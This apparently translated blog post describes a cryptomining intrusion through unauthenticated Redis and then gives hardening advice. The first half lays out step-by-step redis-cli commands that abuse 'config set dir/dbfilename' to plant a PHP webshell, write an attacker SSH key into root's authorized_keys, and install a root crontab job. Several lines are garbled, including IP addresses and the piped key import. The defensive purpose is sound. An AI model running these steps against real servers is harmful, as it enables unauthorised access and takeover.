Recently, the company’s Web server has been attacked for mining for several times. At first, I thought there was a vulnerability in the upload service, which resulted in executable scripts being uploaded to the server and then running. So the upload service program was modified to add various verification of file formats, suffixes, and so on. However, the server was still attacked later. The final investigation found that the reason was that the configuration of Redis was not strict. The attacker used the config command to modify the crontab scheduled task and realized SSH secret free login.
When installing Redis, you use the default configuration (default listening address and port) and do not set the password, but this configuration can sometimes cause the server that installed Redis to be attacked.
___________ attack
The config command in the Redis command can modify the Redis configuration without restarting the Redis service. The following attacks are implemented by using the config command to change the default Redis data storage directory and file name.
⓵ webshell
If the root directory of a website is known, then Redis can be used for webshell attacks:
-
First, set the Redis data storage directory as the site root directory
-
Then write the code you want to execute to the site root via the Redis command
dummyUser@XPS13:~$ redis-cli -h 10.1010.1.
10.1010.1.:6379> config set dir /usr/local/nginx/html
OK
10.1010.1.:6379> config set dbfilename redis.php
OK
10.1010.1.:6379> set test "
"
OK
10.1010.1.:6379> save
OK
Copy the codeAfter doing this, a file called redis.php is generated in the root directory of the site. By accessing this file through the URL, you can know all the configuration information related to PHP on the server.
⓶ SSH
If we can know which users and groups running Redis have write permissions on their home directories (sometimes running as root), then we can use Redis to log in to the server confidential-free.
- Through the command line
ssh-keygen -t rsaGenerate public and private keys locally - Write the generated public key contents to a text file:
(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > key.txt - Import the generated text file to
Redis:The cat key. TXT | redis - cli - h 10.10.10.1 - set ssh_key x - Save the public key to
authorized_keys中
dummyUser@XPS13:~$ redis-cli -h 10.1010.1.
10.1010.1.:6379> config set dir /root/.ssh
OK
10.1010.1.:6379> config set dbfilename authorized_keys
OK
10.1010.1.:6379> save
OK
Copy the codeAfter the preceding operations are complete, you can use SSH to log in to the server SSH [email protected]
⓷ crontab
You can run the crontab -e command to configure scheduled tasks on the server. In fact, these scheduled tasks are saved in files on the server (the centos directory is /var/spool/cron/, Ubuntu’s path to/var/spool/cron/crontabs /). From this, we can save the scheduled tasks we want to execute to the server through the Redis command.
dummyUser@XPS13:~$ echo -e "\n\n * * * * * command to execute" | redis-cli -h 10.1010.1. -x set cron
OK
dummyUser@XPS13:~$ redis-cli -h 10.1010.1.
10.1010.1.:6379> config set dir /var/spool/cron
OK
10.1010.1.:6379> config set dbfilename root
OK
10.1010.1.:6379> save
OK
Copy the code2. To prevent
⓵ binding IP
Change the bind address in the Redis configuration file to a fixed IP address (usually an Intranet IP address), and then restart Redis. In this way, the Redis service only listens for requests from Intranet IP addresses, and others cannot directly connect to the Redis service from the Internet.
⓶ Set a password
The password of the Redis service is empty by default. You can configure requirepass to set only the password or masteruser to set a corresponding user name at the same time. In this way, when connecting to the Redis service, you only need to use the auth command to verify that the operation is successful.
Due to theRedisIt is very fast, and external users can make up to a million attempts per second, so keep your password as long and complex as possible
⓷ Disable some sensitive commands
You can disable some potentially fatal Redis commands, such as config, as well as keys, flushdb, shutdown, etc., through configuration files.
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command KEYS ""
Copy the code⓸ SSL/TLS
Redis supports SSL/TLS as of version 6.0, you can add the BUILD_TLS=yes compilation option at installation time. But doing so would significantly degrade Redis performance.